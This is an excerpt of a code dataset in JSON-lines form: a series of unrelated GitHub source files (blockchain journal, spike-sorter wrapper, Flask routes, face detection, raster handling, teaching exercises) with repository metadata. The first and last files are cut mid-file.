consensus=consensus.BlockPublisher(),\n transaction_executor=transaction_executor,\n send_message=send_message,\n squash_handler=squash_handler\n )\n self._batch_queue = queue.Queue()\n self._publisher_thread = self._PublisherThread(self._block_publisher,\n self._batch_queue)\n # HACK until genesis tool is working\n if \"chain_head_id\" not in self._block_store:\n genesis_block = BlockState(\n block_wrapper=self._block_publisher.generate_genesis_block(),\n weight=0,\n status=BlockStatus.Valid)\n genesis_block.block.set_state_hash(first_state_root)\n\n self._block_store[genesis_block.block.header_signature] = \\\n genesis_block\n self._block_store[\"chain_head_id\"] = \\\n genesis_block.block.header_signature\n self._block_publisher.on_chain_updated(genesis_block.block)\n LOGGER.info(\"Journal created genesis block: %s\",\n genesis_block.block.header_signature)\n\n self._chain_controller = ChainController(\n consensus=consensus.BlockVerifier(),\n block_store=block_store,\n send_message=send_message,\n executor=ThreadPoolExecutor(1),\n transaction_executor=transaction_executor,\n on_chain_updated=self._block_publisher.on_chain_updated,\n squash_handler=self._squash_handler\n )\n self._block_queue = queue.Queue()\n self._chain_thread = self._ChainThread(self._chain_controller,\n self._block_queue)\n\n def get_current_root(self):\n # return self._block_publisher._chain_head.state_root_hash\n return self._chain_controller.chain_head.block.state_root_hash\n\n def start(self):\n # TBD do load activities....\n # TBD transfer activities - request chain-head from\n # network\n self._publisher_thread.start()\n self._chain_thread.start()\n\n def stop(self):\n # time to murder the child threads. 
First ask politely for\n # suicide\n self._publisher_thread.stop()\n self._chain_thread.stop()\n\n def on_block_received(self, block):\n self._block_queue.put(block)\n\n def on_batch_received(self, batch):\n self._batch_queue.put(batch)\n\n def on_block_request(self, block_id):\n if block_id in self._block_store:\n msg = BlockMessage(self._block_store[block_id].block)\n self._send_message(msg)\n","repo_name":"vdt/sawtooth-core","sub_path":"validator/sawtooth_validator/journal/journal.py","file_name":"journal.py","file_ext":"py","file_size_in_byte":24779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"41623347744","text":"'''\n12- Escribir un programa que le pida al usuario que ingrese \ndos números enteros, y luego imprima \"El primer número es positivo\" \nsi el primer número es mayor que cero, \"El segundo número es positivo\" \nsi el segundo número es mayor que cero, o \"Ambos números son negativos\" \nsi los dos números son negativos .\n'''\n\nprimer_numero_str = input(\"ingrese un numero\")\nprimer_numero_int = int(primer_numero_str)\n\nsegundo_numero_str = input(\"ingrese otro numero\")\nsegundo_numero_int = int(segundo_numero_str)\n\n\nif(primer_numero_int > 0):\n print(\"El primer numero es positivo\")\nelif(segundo_numero_int > 0):\n print(\"El segundo numero es positivo\")\nelse:\n print(\"Ambos son negativos\")\n\n\n\n","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"1-Ejercicios-If-GUIA/12_ejercicio_positivo.py","file_name":"12_ejercicio_positivo.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17888711207","text":"from pathlib import Path\nimport os\nfrom typing import Union\nimport shutil\nimport sys\n\nimport numpy as np\n\nfrom spikeinterface.core.core_tools import write_to_h5_dataset_format\nfrom ..basesorter import BaseSorter\nfrom ..utils import ShellScript\n\n# from spikeinterface.extractors import MaxOneRecordingExtractor\nfrom spikeinterface.extractors import HDSortSortingExtractor\n\nPathType = Union[str, Path]\n\n\ndef check_if_installed(hdsort_path: Union[str, None]):\n if hdsort_path is None:\n return False\n assert isinstance(hdsort_path, str)\n\n if hdsort_path.startswith('\"'):\n hdsort_path = hdsort_path[1:-1]\n hdsort_path = str(Path(hdsort_path).absolute())\n if (Path(hdsort_path) / \"+hdsort\").is_dir():\n return True\n else:\n return False\n\n\nclass HDSortSorter(BaseSorter):\n \"\"\"HDSort Sorter object.\"\"\"\n\n sorter_name: str = \"hdsort\"\n compiled_name: str = \"hdsort_compiled\"\n hdsort_path: Union[str, None] = os.getenv(\"HDSORT_PATH\", None)\n requires_locations = False\n _default_params = {\n \"detect_threshold\": 4.2,\n \"detect_sign\": -1, # -1 - 1\n \"filter\": True,\n \"parfor\": True,\n \"freq_min\": 300,\n \"freq_max\": 7000,\n \"max_el_per_group\": 9,\n \"min_el_per_group\": 1,\n \"add_if_nearer_than\": 20,\n \"max_distance_within_group\": 52,\n \"n_pc_dims\": 6,\n \"chunk_size\": 500000,\n \"loop_mode\": \"local_parfor\",\n \"chunk_memory\": \"500M\",\n }\n\n _params_description = {\n \"detect_threshold\": \"Threshold for spike detection\",\n \"detect_sign\": \"Use -1 (negative) or 1 (positive) depending \" \"on the sign of the spikes in the recording\",\n \"filter\": \"Enable or disable filter\",\n \"parfor\": \"If True, the Matlab parfor is used\",\n \"freq_min\": \"High-pass filter cutoff frequency\",\n \"freq_max\": \"Low-pass filter cutoff frequency\",\n 
\"max_el_per_group\": \"Maximum number of channels per electrode group\",\n \"min_el_per_group\": \"Minimum number of channels per electrode group\",\n \"add_if_nearer_than\": \"Minimum distance to add electrode to an electrode group\",\n \"max_distance_within_group\": \"Maximum distance within an electrode group\",\n \"n_pc_dims\": \"Number of principal components dimensions to perform initial clustering\",\n \"chunk_size\": \"Chunk size in number of frames for template-matching\",\n \"loop_mode\": \"Loop mode: 'loop', 'local_parfor', 'grid' (requires a grid architecture)\",\n \"chunk_memory\": \"Chunk size in Mb for saving to binary format (default 500Mb)\",\n }\n\n sorter_description = \"\"\"HDSort is a template-matching spike sorter designed for high density micro-electrode arrays.\n For more information see https://doi.org/10.1152/jn.00803.2017\"\"\"\n\n installation_mesg = \"\"\"\\nTo use HDSort run:\\n\n >>> git clone https://git.bsse.ethz.ch/hima_public/HDsort.git\n and provide the installation path by setting the HDSORT_PATH\n environment variables or using HDSortSorter.set_hdsort_path().\\n\\n\n\n More information on HDSort at:\n https://git.bsse.ethz.ch/hima_public/HDsort.git\n \"\"\"\n\n handle_multi_segment = False\n\n @classmethod\n def is_installed(cls):\n if cls.check_compiled():\n return True\n return check_if_installed(cls.hdsort_path)\n\n @classmethod\n def get_sorter_version(cls):\n if cls.check_compiled():\n return \"compiled\"\n p = os.getenv(\"HDSORT_PATH\", None)\n if p is None:\n return \"unknown\"\n else:\n with open(str(Path(p) / \"version.txt\"), mode=\"r\", encoding=\"utf8\") as f:\n version = f.readline()\n return version\n\n @staticmethod\n def set_hdsort_path(hdsort_path: PathType):\n HDSortSorter.hdsort_path = str(Path(hdsort_path).absolute())\n try:\n print(\"Setting HDSORT_PATH environment variable for subprocess calls to:\", hdsort_path)\n os.environ[\"HDSORT_PATH\"] = hdsort_path\n except Exception as e:\n print(\"Could not set HDSORT_PATH environment variable:\", e)\n\n @classmethod\n def _check_apply_filter_in_params(cls, params):\n return params[\"filter\"]\n\n @staticmethod\n def _generate_configs_file(sorter_output_folder, params, file_name, file_format):\n P = {}\n\n # preprocess\n P[\"filter\"] = 1.0 if params[\"filter\"] else 0.0\n P[\"parfor\"] = True if params[\"parfor\"] else False\n P[\"hpf\"] = float(params[\"freq_min\"])\n P[\"lpf\"] = float(params[\"freq_max\"])\n\n # leg creationg\n P[\"legs\"] = {\n \"maxElPerGroup\": float(params[\"max_el_per_group\"]),\n \"minElPerGroup\": float(params[\"min_el_per_group\"]),\n \"addIfNearerThan\": float(params[\"add_if_nearer_than\"]), # always add direct neighbors\n \"maxDistanceWithinGroup\": float(params[\"max_distance_within_group\"]),\n }\n\n # spike detection\n P[\"spikeDetection\"] = {\"method\": \"-\", \"thr\": float(params[\"detect_threshold\"])}\n P[\"artefactDetection\"] = {\"use\": 0.0}\n\n # pre-clustering\n P[\"noiseEstimation\"] = {\"minDistFromSpikes\": 80.0}\n P[\"spikeAlignment\"] = {\"initAlignment\": \"-\", \"maxSpikes\": 50000.0} # so many spikes will be clustered\n P[\"featureExtraction\"] = {\"nDims\": float(params[\"n_pc_dims\"])} # 6\n P[\"clustering\"] = {\n \"maxSpikes\": 50000.0, # dont align spikes you dont cluster..\n \"meanShiftBandWidthFactor\": 1.8\n # 'meanShiftBandWidth': sqrt(1.8*6) # todo: check this!\n }\n\n # template matching\n P[\"botm\"] = {\"run\": 0.0, \"Tf\": 75.0, \"cutLeft\": 20.0}\n P[\"spikeCutting\"] = {\"maxSpikes\": 200000000000.0, \"blockwise\": 
False} # Set this to basically inf\n P[\"templateEstimation\"] = {\"cutLeft\": 10.0, \"Tf\": 55.0, \"maxSpikes\": 100.0}\n\n # merging\n P[\"mergeTemplates\"] = {\n \"merge\": 1.0,\n \"upsampleFactor\": 3.0,\n \"atCorrelation\": 0.93, # DONT SET THIS TOO LOW! USE OTHER ELECTRODES ON FULL FOOTPRINT TO MERGE\n \"ifMaxRelDistSmallerPercent\": 30.0,\n }\n\n # configs\n sort_name = \"hdsort_output\"\n cfgs = {}\n cfgs[\"rawFile\"] = file_name\n cfgs[\"sortingName\"] = sort_name\n cfgs[\"fileFormat\"] = file_format\n cfgs[\"chunkSize\"] = float(params[\"chunk_size\"])\n cfgs[\"loopMode\"] = params[\"loop_mode\"]\n\n data = {\"P\": P, **cfgs}\n import scipy.io\n\n scipy.io.savemat(str(sorter_output_folder / \"configsParams.mat\"), data)\n\n @classmethod\n def _setup_recording(cls, recording, sorter_output_folder, params, verbose):\n #  if isinstance(recording, MaxOneRecordingExtractor):\n if False: # TODO\n # ~ self.params['file_name'] = str(Path(recording._file_path).absolute())\n trace_file_name = str(Path(recording._file_path).absolute())\n # ~ self.params['file_format'] = 'maxone'\n file_format = \"maxone\"\n if verbose:\n print(\"Using MaxOne format directly\")\n else:\n # Generate three files dataset in Mea1k format\n trace_file_name = cls.write_hdsort_input_format(\n recording, str(sorter_output_folder / \"recording.h5\"), chunk_memory=params[\"chunk_memory\"]\n )\n # ~ self.params['file_format'] = 'mea1k'\n file_format = \"mea1k\"\n\n cls._generate_configs_file(sorter_output_folder, params, trace_file_name, file_format)\n\n # store sample rate in a file\n samplerate = recording.get_sampling_frequency()\n samplerate_fname = str(sorter_output_folder / \"samplerate.txt\")\n with open(samplerate_fname, \"w\") as f:\n f.write(\"{}\".format(samplerate))\n\n source_dir = Path(Path(__file__).parent)\n shutil.copy(str(source_dir / \"hdsort_master.m\"), str(sorter_output_folder))\n\n @classmethod\n def _run_from_folder(cls, sorter_output_folder, params, verbose):\n if cls.check_compiled():\n shell_cmd = f\"\"\"\n #!/bin/bash\n {cls.compiled_name} {sorter_output_folder}\n \"\"\"\n else:\n sorter_output_folder = sorter_output_folder.absolute()\n hdsort_path = Path(cls.hdsort_path).absolute()\n\n if \"win\" in sys.platform and sys.platform != \"darwin\":\n disk_move = str(sorter_output_folder)[:2]\n shell_cmd = f\"\"\"\n {disk_move}\n cd {sorter_output_folder}\n matlab -nosplash -wait -r \"{cls.sorter_name}_master('{sorter_output_folder}', '{hdsort_path}')\"\n \"\"\"\n else:\n shell_cmd = f\"\"\"\n #!/bin/bash\n cd \"{sorter_output_folder}\"\n matlab -nosplash -nodisplay -r \"{cls.sorter_name}_master('{sorter_output_folder}', '{hdsort_path}')\"\n \"\"\"\n shell_script = ShellScript(\n shell_cmd,\n script_path=sorter_output_folder / f\"run_{cls.sorter_name}\",\n log_path=sorter_output_folder / f\"{cls.sorter_name}.log\",\n verbose=verbose,\n )\n shell_script.start()\n retcode = shell_script.wait()\n\n if retcode != 0:\n raise Exception(\"HDsort returned a non-zero exit code\")\n\n @classmethod\n def _get_result_from_folder(cls, sorter_output_folder):\n sorter_output_folder = Path(sorter_output_folder)\n sorting = HDSortSortingExtractor(\n file_path=str(sorter_output_folder / \"hdsort_output\" / \"hdsort_output_results.mat\")\n )\n return sorting\n\n @classmethod\n def write_hdsort_input_format(cls, recording, save_path, chunk_memory=\"500M\"):\n try:\n import h5py\n except:\n raise Exception(\"To use HDSort, install h5py: pip install h5py\")\n\n # check if already in write format\n write_file = True\n 
if hasattr(recording, \"_file_path\"):\n if Path(recording._file_path).suffix in [\".h5\", \".hdf5\"]:\n with h5py.File(recording._file_path, \"r\") as f:\n keys = f.keys()\n if (\n \"version\" in keys\n and \"ephys\" in keys\n and \"mapping\" in keys\n and \"frame_rate\" in keys\n and \"frame_numbers\" in keys\n ):\n if \"sig\" in f[\"ephys\"].keys():\n write_file = False\n trace_file_name = str(Path(recording._file_path).absolute())\n\n if write_file:\n save_path = Path(save_path)\n if save_path.suffix == \"\":\n save_path = Path(str(save_path) + \".h5\")\n mapping_dtype = np.dtype(\n [(\"electrode\", np.int32), (\"x\", np.float64), (\"y\", np.float64), (\"channel\", np.int32)]\n )\n\n locations = recording.get_property(\"location\")\n assert locations is not None, \"'location' property is needed to run HDSort\"\n\n with h5py.File(save_path, \"w\") as f:\n f.create_group(\"ephys\")\n f.create_dataset(\"version\", data=str(20161003))\n ephys = f[\"ephys\"]\n ephys.create_dataset(\"frame_rate\", data=recording.get_sampling_frequency())\n ephys.create_dataset(\"frame_numbers\", data=np.arange(recording.get_num_frames(segment_index=0)))\n # save mapping\n mapping = np.empty(recording.get_num_channels(), dtype=mapping_dtype)\n x = locations[:, 0]\n y = locations[:, 1]\n # channel should be from 0 to num_channel - 1\n for i, ch in enumerate(recording.get_channel_ids()):\n mapping[i] = (ch, x[i], y[i], i)\n ephys.create_dataset(\"mapping\", data=mapping)\n # save traces\n segment_index = 0\n write_to_h5_dataset_format(\n recording,\n dataset_path=\"/ephys/signal\",\n segment_index=0,\n file_handle=f,\n time_axis=1,\n chunk_memory=chunk_memory,\n )\n\n trace_file_name = str(save_path.absolute())\n\n return trace_file_name\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/sorters/external/hdsort.py","file_name":"hdsort.py","file_ext":"py","file_size_in_byte":12446,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"9207067072","text":"from tkinter import S\nfrom app import app\nfrom flask import render_template\nfrom flask import request\nfrom flask import redirect\nfrom flask import url_for\nfrom app import db\nfrom app.models import StartUp\nfrom flask import jsonify\n\n@app.route('/', methods=['GET'])\n@app.route('/home', methods=['GET'])\n@app.route('/dashboard', methods=['GET'])\ndef dashboard_page():\n return render_template('dashboard_page.html')\n\ndef get_startups():\n startups = {}\n searches = StartUp.query.all()[:10]\n for startup in searches:\n startups[startup.id] = {\n 'Startup Name': startup.startup_name,\n 'Startup Description' : startup.startup_description\n }\n return startups\n\n\n@app.route('/startups', methods=['GET'])\ndef startups_page():\n #startups = get_startups()\n page_number = request.args.get('page', 1, type=int)\n #startups = StartUp.query\n results = StartUp.query.paginate(page=page_number, per_page=app.config['RESULTS_PER_PAGE'])\n startups = []\n for result in results.items:\n startups.append(\n {\n 'id': result.id,\n 'startup_name': result.startup_name,\n 'startup_description': result.startup_description,\n 'startup_website': result.startup_website\n }\n )\n return render_template('startups_page.html', startups=startups)\n\n@app.route('/data', methods=['GET'])\ndef data():\n results = {}\n searches = StartUp.query.all()\n for startup in searches:\n results[startup.id] = {\n 'Startup Name': startup.startup_name,\n 'Startup Description' : startup.startup_description\n }\n 
return jsonify(results)\n\n@app.route('/investors', methods=['GET'])\ndef investor_page():\n return render_template('investors_page.html')\n\n@app.route('/business_hubs', methods=['GET'])\ndef business_hubs_page():\n return render_template('business_hubs_page.html')\n\n","repo_name":"lyleokoth/startup-directory","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15128765759","text":"\nfrom steamctl.argparser import register_command\n\n\nepilog = \"\"\"\\\n\"\"\"\n\n@register_command('assistant', help='Helpful automation', epilog=epilog)\ndef cmd_parser(cp):\n def print_help(*args, **kwargs):\n cp.print_help()\n\n cp.set_defaults(_cmd_func=print_help)\n\n sub_cp = cp.add_subparsers(metavar='',\n dest='subcommand',\n title='List of sub-commands',\n description='',\n )\n\n scp_i = sub_cp.add_parser(\"idle-games\", help=\"Idle up to 32 games for game time\")\n scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_games')\n scp_i.add_argument('app_ids', nargs='+', metavar='AppID', type=int, help='App ID(s) to idle')\n\n scp_i = sub_cp.add_parser(\"idle-cards\", help=\"Automatic idling for game cards\")\n scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_cards')\n\n scp_i = sub_cp.add_parser(\"discovery-queue\", help=\"Explore a single discovery queue\")\n scp_i.set_defaults(_cmd_func=__name__ + '.discovery_queue:cmd_assistant_discovery_queue')\n","repo_name":"ValvePython/steamctl","sub_path":"steamctl/commands/assistant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"53"} +{"seq_id":"32360542677","text":"import os\nimport json\n\ndef organize():\n #iterate across the directories in the ./PIE/images/set0*/videos_****\n \n set_path = \"PIE/images/\"\n sets = os.listdir(set_path)\n new_dir = \"processed_images\"\n cfg = open(\"config.json\")\n config = json.load(cfg)\n cfg.close()\n ffmpeg_fps = config['ffmpeg_fps']\n naming = {\n \"01\": \"03\",\n \"02\": \"02\",\n \"03\": \"03\",\n \"04\": \"12\",\n \"05\": \"01\"\n }\n for set_ in sets:\n if set_.startswith('.DS_Store'):\n continue\n path = set_path + set_ + \"/\"\n video_dir = os.listdir(path)\n set_name = set_\n for video in video_dir:\n if video.startswith('.DS_Store'):\n continue\n video_path = path + video + \"/\"\n imgs = os.listdir(video_path)\n if len(imgs) == 0:\n continue\n for img in imgs:\n orig_img = img\n img = int(str(img)[:-4])\n img = int(img * 30.0 / ffmpeg_fps)\n number = set_name[3:5]\n old_dest = video_path + orig_img\n new_dest = \"/s{}_vid00{}_f\".format(number, naming[number])\n os.rename(video_path + \"/\" + orig_img, new_dir + new_dest + str(img) +\".png\")\n\norganize()","repo_name":"justintocco/EquiMOT","sub_path":"data_organizer.py","file_name":"data_organizer.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17717936453","text":"from django.utils import timezone\nimport graphene\nfrom stewardship.models import Patient, PatientForm\nfrom stewardship.graphql.types import PatientObj, PatientDataFormObj\n\n\nclass PatientQuery(graphene.ObjectType):\n patients = graphene.List(PatientObj)\n patient = graphene.Field(PatientObj, id=graphene.ID())\n activePatients = graphene.List(PatientObj)\n 
todayPatientList = graphene.List(PatientObj)\n\n def resolve_patients(self, info):\n return Patient.objects.all()\n\n def resolve_patient(self, info, **kwargs):\n id = kwargs.get(\"id\")\n return Patient.objects.get(id=id)\n\n def resolve_activePatients(self, info):\n return Patient.objects.filter(active=True)\n\n def resolve_todayPatientList(self, info):\n result = Patient.objects.filter(\n active=True, lastReviewDate__lt=timezone.datetime.now().date()\n )\n result2 = Patient.objects.filter(active=True, lastReviewDate__isnull=True)\n return result | result2\n","repo_name":"anshuman-8/antibiotic-stewardship-server","sub_path":"stewardship/graphql/query/patient.py","file_name":"patient.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5042457496","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport urwid\n\n\nclass MessageDialog(urwid.WidgetWrap):\n \"\"\"Wraps 'urwid.Overlay' to show a message and expects a reaction from the user.\"\"\"\n \n def __init__(self, contents, btns, overlay_size, *, contents_align=\"left\", space_between_btns=2, title=\"\", title_align=\"center\",\n background=urwid.SolidFill(\"#\"), overlay_align=(\"center\", \"middle\"), overlay_min_size=(None, None), left=0, right=0,\n top=0, bottom=0):\n # Message part\n texts = [urwid.Text(content, align=contents_align)\n for content in contents]\n \n # Lower part\n lower_part = [urwid.Divider(\" \"),\n urwid.Columns(btns, dividechars=space_between_btns)]\n \n # frame \n line_box = urwid.LineBox(urwid.Pile(texts + lower_part),\n title=title,\n title_align=title_align)\n \n # Wrap 'urwid.Overlay'\n super().__init__(urwid.Overlay(urwid.Filler(line_box),\n background,\n overlay_align[0],\n overlay_size[0],\n overlay_align[1],\n overlay_size[1],\n min_width=overlay_min_size[0],\n min_height=overlay_min_size[1],\n left=left,\n right=right,\n top=top,\n bottom=bottom))\n ","repo_name":"markqvist/NomadNet","sub_path":"nomadnet/vendor/additional_urwid_widgets/widgets/message_dialog.py","file_name":"message_dialog.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":337,"dataset":"github-code","pt":"53"} +{"seq_id":"31099793410","text":"# -*- coding: utf-8 -*-\n\n# Backtrack, exhaustive search\n# Implementation from the book\n# runtime O(n!) 
factorial (very slow, similar to exponential)\n\n\n# backtrack-DFS\ndef backtrack_permutations(input):\n solution = [0] * input\n def _backtrack(k):\n #print(k, solution)\n # test first K elements of solution form a complete solution\n if k == input:\n # do something with a complete solution\n print([s+1 for s in solution])\n else:\n # possible candidates for the Kth position of solution\n # implicit tree of all possibilities\n in_perm = set(solution[:k])\n for i in range(input):\n if i not in in_perm:\n solution[k] = i\n _backtrack(k + 1)\n _backtrack(0)\n\n\n# Avoids allocating a set O(n),\n# but does not change the complexity\ndef backtrack_permutations_v2(input):\n solution = {} # treat as ordered set\n def _backtrack(k):\n if k == input:\n print([s+1 for s in solution])\n else:\n for i in range(input):\n if i not in solution:\n solution[i] = None\n _backtrack(k + 1)\n del solution[i]\n _backtrack(0)\n\n\n# set {1, 2, 3}\nbacktrack_permutations(3)\n# [1, 2, 3]\n# [1, 3, 2]\n# [2, 1, 3]\n# [2, 3, 1]\n# [3, 1, 2]\n# [3, 2, 1]\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/07_00_backtrack_permutations.py","file_name":"07_00_backtrack_permutations.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26059085797","text":"import cv2\n\nvideo = cv2.VideoCapture(0)\n\nclassificador_face = cv2.CascadeClassifier('cascades\\haarcascade_frontalface_default.xml')\n\nwhile True:\n conectado , frame = video.read()\n #print(conectado)\n\n frame_cinza = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces_detectadas = classificador_face.detectMultiScale(frame_cinza, minSize = (50,50))\n\n # minSize tamanho minimo do quadrado, padrão é (30, 30)\n\n for(x, y, l, a) in faces_detectadas:\n cv2.rectangle(frame,(x , y), (x + l, y + a), (1, 1, 200), 2)\n #(x , y), (x + l, y + a), (1, 1, 255), 2)\n\n cv2.imshow(\"Video\", frame)\n if (cv2.waitKey(1) == ord(\"q\")):\n break\n\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"Joaohdss/Deteccao-De-Face-Na-WebCam","sub_path":"Deteccao WebCan/DeteccaoWebCan.py","file_name":"DeteccaoWebCan.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19962171167","text":"import time\nimport os\nimport cv2\nimport numpy as np\nfrom argparse import ArgumentParser\n\nfrom tqdm import tqdm\n\nparser = ArgumentParser()\n\nparser.add_argument(\"--folder\", type=str)\n\nargs = parser.parse_args()\n\n\n#region Detector\nprotoPath = \"deploy.prototxt\"\nmodelPath = \"res10_300x300_ssd_iter_140000.caffemodel\"\n\ndetector = cv2.dnn.readNetFromCaffe(protoPath, modelPath)\n#endregion\n\ndirs = os.listdir(args.folder)\n\nfor inner in tqdm(dirs, desc=\"Dirs\"):\n\n path = os.path.join(args.folder, inner)\n\n if not os.path.isdir(path):\n continue\n\n files = os.listdir(path)\n\n for f in tqdm(files, desc=path):\n\n file = os.path.join(path, f)\n\n image = cv2.imread(file)\n\n imageBlob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300), 1.0 ))\n\n detector.setInput(imageBlob)\n\n detections = detector.forward()\n\n detection = detections[0][0][0]\n\n if detection[2]>=0.80:\n \n (h, w) = image.shape[:2]\n \n box = detection[3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n face = image[startY:endY, startX:endX]\n (fH, fW) = face.shape[:2]\n\n # Minimum size\n if fH>=20 and fW>=20:\n cv2.imwrite(file, face)\n else:\n 
print(\"Face not found:\", file)\n os.remove(file)\n\n else:\n\n print(\"Face not found:\", file)\n os.remove(file)\n","repo_name":"danigunawan/Face101","sub_path":"face_detection/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13747604152","text":"\r\n# Creator: OmarAfet\r\n# https://profile.satr.codes/OmarAfet/public/overview\r\n# https://github.com/OmarAfet\r\n\r\nimport math\r\ndef array_root(arr: list[float]) -> list[float]:\r\n result = []\r\n for i in arr:\r\n result.append(math.sqrt(i))\r\n \r\n return result","repo_name":"OmarAfet/CoderHub","sub_path":"Python/Medium/المصفوفة الجذرية.py","file_name":"المصفوفة الجذرية.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23285916379","text":"from train.qm9_trainer import train_qm9\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', type=int, default=12345)\narg = parser.parse_args()\nseed = arg.seed\n\nPE_PATH = 'net/0909.pt'\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=False,\n force_save=True,\n position_encoder_path='',\n tag='qm9_nopos@{}'.format(seed)\n )\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=True,\n force_save=True,\n position_encoder_path='',\n tag='qm9_3pos@{}'.format(seed)\n )\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=False,\n force_save=True,\n position_encoder_path=PE_PATH,\n tag='qm9_pos@{}'.format(seed)\n )\n\ntrain_qm9(seed=seed,\n use_cuda=True,\n limit=-1,\n use_tqdm=False,\n use_pos=False,\n force_save=True,\n position_encoder_path=PE_PATH,\n q_only=True,\n tag='qm9_q_only@{}'.format(seed)\n )\n","repo_name":"PKUterran/HamNet","sub_path":"train_qm9.py","file_name":"train_qm9.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"584691608","text":"\"\"\"\nAuthor: Kazybek Askarbek\nDate: 01.08.22\nDescription: File includes raster dataset handler. Current implementation uses rasterio but it could be easily replaced\n\"\"\"\n# third party libraries\nfrom pathlib import Path\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport rasterio as rio\nfrom pydantic import FilePath\nfrom rasterio.crs import CRS\nfrom rasterio.warp import calculate_default_transform\nfrom rasterio.warp import reproject\nfrom rasterio.warp import Resampling\n\n\n# local modules\n# from innofw.core.types import PathLike\n\n\nclass RasterDataset:\n \"\"\"Raster dataset class, handles dataset creation, dynamic band addition and sync of nodata value across bands\n\n Attributes\n ----------\n DN_NODATA: int\n defines values to be used as a replacement of null values in the raster\n DRIVER: str\n sets up the default rasterio driver\n\n Methods\n -------\n get_file_metadata(file_path: FilePath) -> dict\n Parses file with metadata into a dictionary\n add_band(self, band_path: FilePath, band_index: int) -> None\n Adds a new band inplace into raster. 
Resamples new band if needed\n \"\"\"\n\n DN_NODATA = 0\n DRIVER = \"GTiff\"\n\n def __init__(self, dst_path: Union[str, Path], metadata=None):\n dst_path = Path(dst_path)\n dst_path.parent.mkdir(exist_ok=True, parents=True)\n # if (\n # metadata\n # and \"driver\" not in metadata\n # or (\n # dst_path.suffix in [\".tif\", \".tiff\"]\n # and metadata[\"driver\"] != self.DRIVER\n # )\n # ):\n metadata[\"driver\"] = self.DRIVER\n\n self.ds = rio.open(dst_path, \"w+\", **metadata)\n\n @staticmethod\n def get_file_metadata(file_path: FilePath) -> dict:\n with rio.open(file_path) as f:\n _metadata = f.meta\n return _metadata\n\n @staticmethod\n def get_reprojection_metadata(\n file_path: FilePath,\n target_crs_epsg: Optional[int] = None,\n resolution: Optional[Tuple[int, int]] = None,\n ) -> dict:\n with rio.open(file_path) as f:\n left, bottom, right, top = f.bounds\n\n target_crs = (\n f.crs\n if target_crs_epsg is None\n else CRS.from_epsg(target_crs_epsg)\n )\n\n transform, width, height = calculate_default_transform(\n src_crs=f.crs,\n dst_crs=target_crs,\n width=f.width,\n height=f.height,\n left=left,\n bottom=bottom,\n right=right,\n top=top,\n resolution=resolution,\n )\n metadata = {\n \"crs\": target_crs,\n \"transform\": transform,\n \"width\": width,\n \"height\": height,\n }\n return metadata\n\n def add_band(self, band_path: FilePath, band_index: int) -> None:\n \"\"\"Adds a new band inplace into raster. Resamples new band if needed\"\"\"\n with rio.open(band_path) as image_band:\n if self.ds.crs == image_band.crs:\n self.ds.write(image_band.read(1), band_index)\n else:\n transform, width, height = calculate_default_transform(\n image_band.crs,\n self.ds.crs,\n image_band.width,\n image_band.height,\n *image_band.bounds,\n )\n\n reproject(\n source=rio.band(image_band, 1),\n destination=rio.band(self.ds, band_index),\n src_transform=image_band.transform,\n src_crds=self.ds.crs,\n dst_transform=transform,\n dst_crs=self.ds.crs,\n resampling=Resampling.bilinear,\n )\n\n def close(self) -> None:\n self.sync_bands_nodata()\n self.ds.close()\n\n def sync_bands_nodata(self) -> None:\n pass\n # self._build_nodata_mask()\n\n # for band_index in self.ds.indexes:\n # data = self.ds.read(band_index)\n # data[self.nodata_mask] = self.DN_NODATA\n #\n # self.ds.write(data, indexes=band_index)\n #\n # def _build_nodata_mask(self) -> None:\n # self.nodata_mask = np.zeros((self.ds.count, self.ds.height, self.ds.width), dtype=\"bool\")\n # for i, 